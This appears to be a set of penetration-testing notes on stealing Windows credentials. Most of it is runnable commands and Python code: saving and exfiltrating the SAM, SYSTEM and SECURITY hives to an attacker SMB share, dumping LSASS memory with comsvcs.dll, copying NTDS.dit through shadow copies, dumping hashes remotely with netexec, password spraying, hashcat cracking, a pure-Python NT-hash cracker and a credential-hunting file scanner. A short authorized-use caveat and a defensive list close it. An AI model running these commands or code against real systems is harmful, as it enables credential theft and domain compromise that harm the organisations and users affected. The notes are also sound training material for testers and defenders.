Windows Local Password Attacks

Credential Storage Mechanisms

Security Account Manager (SAM) Database

  • Purpose: Stores the password hashes of local accounts on every Windows host (the only account store on non-domain-joined machines; domain members still keep their local Administrator and other local accounts here)

  • Location: Registry hive HKLM\SAM (backed by %SystemRoot%\System32\config\SAM); the related hives HKLM\SYSTEM (boot key that decrypts SAM) and HKLM\SECURITY (LSA secrets, cached domain logons) are captured alongside it

  • Scope: Local user accounts on individual Windows machines

  • Functionality:

    • Stores NT hashes (MD4 over the UTF-16LE password) for local user accounts; LM hashes are disabled by default on modern Windows

    • Hashes are encrypted with the boot key held in the SYSTEM hive, so a copy of SAM alone cannot be decrypted; with both hives the hashes can be extracted and cracked offline

    • Primary credential store for non-domain-joined computers

Local Security Authority Subsystem Service (LSASS)

  • Purpose: Central credential management process in Windows

  • Location: lsass.exe in Windows system processes

  • Functionality:

    • Caches credentials locally in memory

    • Creates and manages access tokens

    • Handles authentication processes

    • Stores credentials for:

      • Currently logged-in users

      • Cached domain credentials

      • Service account credentials

  • Security Implications:

    • Primary target for credential dumping attacks (a memory dump of the process can be parsed offline)

    • Holds credentials in memory in several forms: NT hashes, Kerberos tickets and keys, and cleartext passwords when the WDigest provider is enabled (UseLogonCredential=1)

    • Can retain credentials after a user logs off, until the logon session is torn down

    • LSA Protection (RunAsPPL) and Credential Guard restrict what even an administrator can read from the process

NT Directory Services (NTDS.dit)

  • Purpose: Primary database for Active Directory domain controllers

  • Location: %SystemRoot%\NTDS\NTDS.dit

  • Scope: Enterprise-wide credential storage in Windows domain environments

  • Functionality:

    • Stores user account information for entire Windows domain

    • Contains:

      • User account credentials

      • Group Policy information

      • Domain controller configuration

      • Replication metadata

    • Centralized authentication mechanism for domain-joined computers

    • Enables domain-wide login and access control

  • Key Characteristics:

    • Password hashes are encrypted with the Password Encryption Key (PEK), which is itself encrypted with the boot key from the SYSTEM hive, so NTDS.dit must be captured together with that hive

    • The file is locked while the directory service runs, so it is copied from a volume shadow copy or with ntdsutil, or the hashes are pulled remotely over the directory replication protocol (DRSUAPI)

    • Contains more comprehensive user information compared to SAM database (all domain users, computer accounts and Kerberos keys)

SAM Database Attack Methodology

Registry Hive Extraction

  • Requires Administrative Privileges (run from an elevated prompt; a UAC-filtered administrator token is not enough)

  • Extracts the three registry hives needed to decrypt the local password hashes offline

  • Command to Save Hives:

    reg.exe save hklm\sam C:\sam.save
    reg.exe save hklm\system C:\system.save
    reg.exe save hklm\security C:\security.save

Transferring Hives to Attack Host

  1. Set Up SMB Server (on the attack host):

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/save

    Current Windows builds refuse unauthenticated guest access to SMB shares by default; if the move below fails, start smbserver.py with -username and -password and map the share with those credentials first.

  2. Move Hive Files (from the target, using the paths the hives were saved to):

    move C:\sam.save \\<ATTACKER_IP>\CompData
    move C:\system.save \\<ATTACKER_IP>\CompData
    move C:\security.save \\<ATTACKER_IP>\CompData

Hash Extraction with Impacket

  • Uses Impacket's secretsdump.py to decrypt the saved hives offline; the trailing LOCAL tells it to parse local files instead of connecting to a host

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

  • Output: SAM hashes as user:rid:lmhash:nthash:::, followed by LSA secrets and cached domain logon hashes (DCC2, hashcat mode 2100) from the SECURITY hive

LSASS Memory Dumping Methods

Method 1: Memory Dump Creation with Task Manager (GUI)

  • Steps (requires an administrator session):

    1. Open Task Manager.

    2. Go to the Processes tab (lsass.exe is listed there as "Local Security Authority Process"; the Details tab shows the process name).

    3. Right-click the process.

    4. Select Create dump file.

  • File Location: C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP (the current user's %TEMP%)

  • Transfer: Use file transfer methods (e.g., the SMB share discussed in Attacking SAM).

Method 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

  • Retrieve the lsass.exe PID with:

    • Command Prompt:

      tasklist /svc | findstr lsass

    • PowerShell:

      Get-Process lsass

  • Use rundll32.exe with comsvcs.dll to create a memory dump (from an elevated prompt; the MiniDump export needs SeDebugPrivilege):

    rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

  • Note:

    • Flagged by most modern AV/EDR tools; rundll32 loading comsvcs.dll with the MiniDump export is a well-known signature.

    • Fails with access denied when LSA Protection (RunAsPPL) is enabled, since lsass then runs as a protected process.

    • AV bypass techniques may be required.

Credential Extraction

  • Uses Pypykatz (a Python reimplementation of Mimikatz's sekurlsa module) to parse the minidump offline and print, per logon session, NT hashes, Kerberos material and any cleartext passwords

pypykatz lsa minidump /path/to/lsass.dmp

Active Directory (NTDS.dit) Attacks

Dictionary Attack

  • Attempts authentication against the domain controller with a list of candidate passwords for one user, to obtain a foothold account before going after NTDS.dit (-p accepts a wordlist file)

netexec smb <DC_IP> -u <username> -p <password_list>

  • Check the domain account lockout policy first (lockout threshold and observation window); every failed attempt counts against the threshold and a long wordlist will lock the account

NTDS.dit Capture Methods

  1. Volume Shadow Copy (from an elevated shell on the DC):

    vssadmin create shadow /For=C:
    cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
    cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>

    The shadow copy number is not always 1; use the "Shadow Copy Volume Name" printed by vssadmin create shadow. Capture the SYSTEM hive as well (reg.exe save hklm\system, as in the SAM section): without its boot key secretsdump.py cannot decrypt the hashes in NTDS.dit.

  2. NetExec (formerly CrackMapExec) Method, which pulls the hashes over DRSUAPI replication and needs domain admin credentials (or equivalent replication rights):

    netexec smb <DC_IP> -u <username> -p <password> --ntds

Cracking Hashes with Hashcat

  1. Prepare Hash File (hashestocrack.txt), one NT hash per line (the fourth colon-separated field of the secretsdump.py output):

    64f12cddaa88057e06a81b54e73b949b
    31d6cfe0d16ae931b73c59d7e0c089c0

    The second value is the NT hash of an empty password; an account carrying it is either disabled or logs on without a password, and needs no cracking.

  2. Crack Hashes (-m 1000 is the NTLM mode, i.e. NT hashes):

    sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
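The two steps above, together with the secretsdump.py output format from the SAM section, as a worked Python example: parse secretsdump.py output into a hashcat -m 1000 hash file, triage it before spending GPU time, and compute NT hashes the way mode 1000 does. This is an added example, not code from the original notes, Impacket or hashcat; the dump lines, account names and candidate wordlist are constructed, and md4() is a pure-Python implementation because hashlib's MD4 is often disabled under OpenSSL 3.

```python
"""Prepare hashcat -m 1000 input from secretsdump.py output and show what
that mode computes. Added example, not code from the original notes or from
Impacket/hashcat; the dump text below is constructed."""
import re
import struct
from collections import defaultdict

# Constructed sample of secretsdump.py's SAM section (user:rid:lmhash:nthash:::).
# aad3b4...04ee is the placeholder printed when no LM hash is stored.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Cleaning up...
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
DUMP_LINE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.I)
MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (boolean function, additive constant, X[k] order, shift table)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k_add, order, shifts in rounds:
            for i, k in enumerate(order):
                # Register rotation so each step works on (a, b, c, d) in turn
                a, b, c, d = d, _rol((a + fn(b, c, d) + X[k] + k_add) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """What hashcat -m 1000 computes for every candidate: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(text: str):
    """Return (user, rid, nthash) tuples from secretsdump SAM or NTDS output lines."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            entries.append((m.group(1), int(m.group(2)), m.group(4).lower()))
    return entries


def hashcat_lines(entries):
    """Unique NT hashes, one per line, in first-seen order: the hashestocrack.txt content."""
    seen, lines = set(), []
    for _, _, h in entries:
        if h not in seen:
            seen.add(h)
            lines.append(h)
    return lines


def triage(entries):
    """Before cracking: accounts with an empty password, and hashes shared by several accounts."""
    by_hash = defaultdict(list)
    for user, _, h in entries:
        by_hash[h].append(user)
    empty = by_hash.get(EMPTY_NT, [])
    reused = {h: u for h, u in by_hash.items() if len(u) > 1 and h != EMPTY_NT}
    return empty, reused


def check_candidates(entries, wordlist):
    """Dictionary attack in miniature: hash each candidate once, then look the dump hashes up."""
    table = {nt_hash(w): w for w in wordlist}
    return {user: table[h] for user, _, h in entries if h in table}


if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    print("\n".join(hashcat_lines(entries)))  # this is what goes into hashestocrack.txt
    empty, reused = triage(entries)
    print("empty password:", empty)
    print("same hash (password reuse):", reused)
    print("cracked:", check_candidates(entries, ["letmein", "password", "Winter2023!"]))
```

Run as a script it prints the three unique hashes for hashestocrack.txt, flags Guest and DefaultAccount as empty-password accounts, shows that Administrator and bob share a hash (one crack opens both), and recovers svc_backup's password from the constructed wordlist, since its hash is the well-known NT hash of "password". Replace SAMPLE_DUMP with a real secretsdump.py capture and the same functions apply to NTDS output lines.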

Credential Hunting Commands

Lazagne Credential Extraction

  • Comprehensive tool for extracting stored credentials from browsers, mail clients, Wi-Fi profiles, databases and other applications on the host

lazagne.exe all
# Verbose mode
lazagne.exe all -vv

findstr Keyword Search

  • Searches files recursively (/S) and case-insensitively (/I) for a literal string (/C:) and prints only the names of matching files (/M); drop /M to see the matching lines themselves

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Key Terms for Credential Discovery

  • Generic: password, passphrase, keys, username, creds, users, pwd, login, credentials

  • Application-specific: configuration, dbcredential, dbpassword, passkeys, passphrases
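The same hunt scripted in Python, covering all of the key terms above in one pass and separating key/value lines (where a term sits in a key followed by a value) from mere mentions of the word. This is an added example, not from the original notes or from LaZagne; the files it scans are constructed and written to a temporary directory, and the "assignment" heuristic is this example's own.

```python
"""Multi-term credential keyword hunt over a directory tree, the scripted
counterpart of the findstr one-liner. Added example, not from the original
notes; it writes a few constructed sample files to a temporary directory."""
import re
import tempfile
from pathlib import Path

GENERIC = ["password", "passphrase", "keys", "username", "creds", "users", "pwd", "login", "credentials"]
APP_SPECIFIC = ["configuration", "dbcredential", "dbpassword", "passkeys", "passphrases"]
EXTENSIONS = {".txt", ".ini", ".cfg", ".config", ".xml", ".ps1", ".yml", ".yaml", ".json"}

# Constructed files: two real secrets, one policy sentence, one skipped by
# extension, one binary blob skipped by the NUL-byte check.
SAMPLE_FILES = {
    "conf/web.config": '<connectionStrings>\n'
                       '  <add name="db" connectionString="Server=sql01;User Id=app;Password=Summ3r2024!" />\n'
                       '</connectionStrings>\n',
    "deploy.ps1": '$Username = "svc_deploy"\n'
                  '$Password = ConvertTo-SecureString "Winter2023!" -AsPlainText -Force\n'
                  'Write-Host "deploying"\n',
    "README.txt": "Users must rotate their password every 90 days.\nSee the wiki for details.\n",
    "notes.md": "password = not-scanned-because-of-extension\n",
    "bin/dump.txt": b"MZ\x00\x00password=embedded\x00",
}


def make_sample_tree() -> str:
    """Write the constructed files into a fresh temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="credhunt_"))
    for rel, content in SAMPLE_FILES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        if isinstance(content, bytes):
            p.write_bytes(content)
        else:
            p.write_text(content, encoding="utf-8")
    return str(root)


def is_text(path: Path, sniff: int = 512) -> bool:
    """Cheap binary check: text files do not contain NUL bytes in their first block."""
    with open(path, "rb") as f:
        return b"\x00" not in f.read(sniff)


def hunt(root, terms=None, extensions=EXTENSIONS):
    """Walk root and return hits sorted by (file, line). A hit is an 'assignment' when
    the term is part of a key followed by = : or > and a value, otherwise a 'mention'."""
    terms = terms or GENERIC + APP_SPECIFIC
    alt = "|".join(re.escape(t) for t in terms)
    term_re = re.compile(alt, re.I)  # substring, case-insensitive: same as findstr /I /C:
    assign_re = re.compile(r"[\w.\-]*(?:%s)[\w.\-]*\s*[:=>]\s*[\"']?([^\s\"';,<]+)" % alt, re.I)
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions or not is_text(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            for n, line in enumerate(f, 1):
                m = term_re.search(line)
                if not m:
                    continue
                hits.append({
                    "file": path.relative_to(root).as_posix(),
                    "line": n,
                    "term": m.group(0).lower(),
                    "kind": "assignment" if assign_re.search(line) else "mention",
                    "text": line.strip()[:200],
                })
    return sorted(hits, key=lambda h: (h["file"], h["line"]))


if __name__ == "__main__":
    for h in hunt(make_sample_tree()):
        print(f'{h["kind"]:10} {h["file"]}:{h["line"]} [{h["term"]}] {h["text"]}')
```

Point hunt() at a real directory (a web root, a user's Documents, a scripts share) to get the same structured output; the assignment/mention split is what lets you read the handful of lines that actually carry a value before the hundreds that merely contain the word "users".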

Remote Authentication Attacks

NetExec (formerly CrackMapExec) Remote Attacks

  • Dump LSA Secrets (--local-auth authenticates with a local account on the target instead of a domain account):

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsa

  • Dump SAM Remotely:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --sam

  • Dump NTDS Remotely (against a domain controller, with domain credentials that hold replication rights, so without --local-auth):

    netexec smb <DC_IP> -u <USER> -p <PASSWORD> --ntds

Post-Compromise Enumeration

Local Groups (append a group name, e.g. Administrators, to list its members)

net localgroup

User Account Details (group memberships, last logon, whether a password is required)

net user <username>

Remote Shell Access (WinRM on TCP 5985/5986; the account must be a local administrator or a member of Remote Management Users)

evil-winrm -i <DC_IP> -u <username> -p <password>

Key Considerations

  • Requires administrative or elevated privileges on the target (domain admin or replication rights for NTDS.dit)

  • Most techniques are detectable by modern antivirus and EDR: hive saves with reg.exe, handles opened on lsass.exe, and shadow copies created on a domain controller all generate telemetry

  • Potential to trigger security alerts and, with dictionary attacks, account lockouts

  • Ethical use limited to authorized penetration testing

Defensive Recommendations

  • Implement strong password policies together with an account lockout policy

  • Use multi-factor authentication

  • Regularly update and patch systems

  • Monitor and log authentication events, and alert on reg.exe saves of the SAM and SECURITY hives, non-system processes reading lsass.exe memory, and shadow copy creation on domain controllers

  • Enable LSA Protection (RunAsPPL) and Credential Guard to block LSASS memory dumping

  • Give every machine a unique local administrator password (e.g. Windows LAPS) so one dumped SAM does not open every host